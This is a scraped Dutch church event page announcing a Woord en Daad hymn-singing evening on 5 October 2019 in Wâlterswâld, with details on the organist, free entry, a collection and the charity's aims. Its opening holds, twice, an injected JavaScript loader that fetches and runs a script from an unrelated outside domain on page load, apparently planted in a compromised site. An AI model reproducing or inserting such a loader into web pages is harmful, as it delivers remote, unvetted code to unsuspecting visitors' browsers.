;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Samenzangavond Woord en Daad - PKN Damwâld
5 oktober 2019
19:30 t/m 21:00
Samenzangavond Woord en Daad

WOORD en DAAD organiseert weer een mooie samenzangavond op 5 oktober 2019 in de Hervormde Kerk, Achterwei 31 te Wâlterswâld. Deze avond is om samen te zingen. We zingen psalmen en liederen met medewerking van een muziekgroepje o.l.v. Marianka Visser. Het orgel zal bespeeld worden door dhr. A. Bogerd. De toegang is gratis, er is een verkooptafel aanwezig en er wordt een collecte gehouden voor een project van Woord en Daad.

Woord en Daad werkt vanuit Bijbels perspectief aan duurzame verandering voor mensen in armoede om samen hoop en nieuwe kansen te creëren. Dit doet Woord en Daad d.m.v. o.a. kind sponsoring, werkgelegenheid, scholing, ondernemerschap, stimuleren volgen vakopleiding, noodhulp in rampgebieden, verzorgen toegang tot schoon drinkwater.
De avond begint om 19.30 uur.
Allen hartelijk welkom! Kom samen zingen en neem anderen mee !